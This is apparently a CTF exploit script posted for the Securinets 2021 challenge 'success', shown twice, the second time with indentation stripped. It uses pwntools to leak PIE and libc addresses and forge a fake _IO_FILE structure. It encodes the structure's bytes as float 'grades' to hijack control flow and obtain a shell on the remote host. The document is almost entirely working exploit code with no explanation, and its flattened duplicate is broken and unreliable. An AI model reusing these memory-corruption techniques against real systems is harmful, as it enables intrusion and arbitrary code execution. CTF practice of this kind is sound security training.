hkraw · March 21, 2021 17:04
diff --git a/success.py b/success.py
 from pwn import *
 import numpy as np
 from IO_FILE import *

 if __name__ == '__main__':
 #    io = process('./main2_success')
    io = remote("bin.q21.ctfsecurinets.com",1340)
    libc = ELF("./libc.so.6")

    io.sendafter("Please provide student username: ","AAAAAAAA")
    pie_base = u64(io.recvline()[0x15 : 0x15 + 6] + b'\0\0') - 0x1090
    print(hex(pie_base))
    io.sendafter("Please provide student username: ","AAAAAAAAAAAAAAAA")
    libc_base = u64(io.recvline()[0x15 + 8 : 0x15 + 6 + 8] + b'\0\0') - 0x3e82a0;
    print(hex(libc_base))
    io.sendafter("Please provide student username: ","\n")
    io.sendlineafter("subjects: ","64")
    IO_file = IO_FILE_plus(arch=64)
    str_binsh = 0x1b40fa
    stream = IO_file.construct(
            flags=0, buf_base = 0,
            buf_end=(libc_base+str_binsh-100)//2,write_ptr=(libc_base+str_binsh-100)//2,
            write_base=0,
            lock=libc_base + libc.sym._IO_list_all + 8,
            vtable=libc_base + (libc.sym._IO_str_jumps + 0x18) - 0x10
    ) + p64(libc_base + 0x4f4e0)
    b = []
    k = 0
    print(hexdump(stream))
    for i in range(0, len(stream)):
        if( k > 3 ):
            data_bytes = np.array(b, dtype=np.uint8)
            data_as_float = data_bytes.view(dtype=np.float32)
            io.sendlineafter("grade: ", str(data_as_float[0]))
            b = []
            k = 0
        s = stream[i]
        b.append(s)
        k += 1
    b = []
    for i in range(4, 8):
        b.append( p64(libc_base + 0x4f4e0)[i])
    data_bytes = np.array(b, dtype=np.uint8)
    data_as_float = data_bytes.view(dtype=np.float32)[0]
    io.sendline(str(data_as_float))
    for i in range(6):
        io.sendlineafter('grade: ','0.0')
    b = []
    for i in range(4):
        b.append( p64(pie_base + 0x202060)[i])
    data_bytes = np.array(b, dtype=np.uint8)
    data_as_float = data_bytes.view(dtype=np.float32)[0]
    io.sendlineafter('grade: ',str(data_as_float))
    io.interactive()
	from pwn import *
	import numpy as np
	from IO_FILE import *

	if __name__ == '__main__':
	# io = process('./main2_success')
	io = remote("bin.q21.ctfsecurinets.com",1340)
	libc = ELF("./libc.so.6")

	io.sendafter("Please provide student username: ","AAAAAAAA")
	pie_base = u64(io.recvline()[0x15 : 0x15 + 6] + b'\0\0') - 0x1090
	print(hex(pie_base))
	io.sendafter("Please provide student username: ","AAAAAAAAAAAAAAAA")
	libc_base = u64(io.recvline()[0x15 + 8 : 0x15 + 6 + 8] + b'\0\0') - 0x3e82a0;
	print(hex(libc_base))
	io.sendafter("Please provide student username: ","\n")
	io.sendlineafter("subjects: ","64")
	IO_file = IO_FILE_plus(arch=64)
	str_binsh = 0x1b40fa
	stream = IO_file.construct(
	flags=0, buf_base = 0,
	buf_end=(libc_base+str_binsh-100)//2,write_ptr=(libc_base+str_binsh-100)//2,
	write_base=0,
	lock=libc_base + libc.sym._IO_list_all + 8,
	vtable=libc_base + (libc.sym._IO_str_jumps + 0x18) - 0x10
	) + p64(libc_base + 0x4f4e0)
	b = []
	k = 0
	print(hexdump(stream))
	for i in range(0, len(stream)):
	if( k > 3 ):
	data_bytes = np.array(b, dtype=np.uint8)
	data_as_float = data_bytes.view(dtype=np.float32)
	io.sendlineafter("grade: ", str(data_as_float[0]))
	b = []
	k = 0
	s = stream[i]
	b.append(s)
	k += 1
	b = []
	for i in range(4, 8):
	b.append( p64(libc_base + 0x4f4e0)[i])
	data_bytes = np.array(b, dtype=np.uint8)
	data_as_float = data_bytes.view(dtype=np.float32)[0]
	io.sendline(str(data_as_float))
	for i in range(6):
	io.sendlineafter('grade: ','0.0')
	b = []
	for i in range(4):
	b.append( p64(pie_base + 0x202060)[i])
	data_bytes = np.array(b, dtype=np.uint8)
	data_as_float = data_bytes.view(dtype=np.float32)[0]
	io.sendlineafter('grade: ',str(data_as_float))
	io.interactive()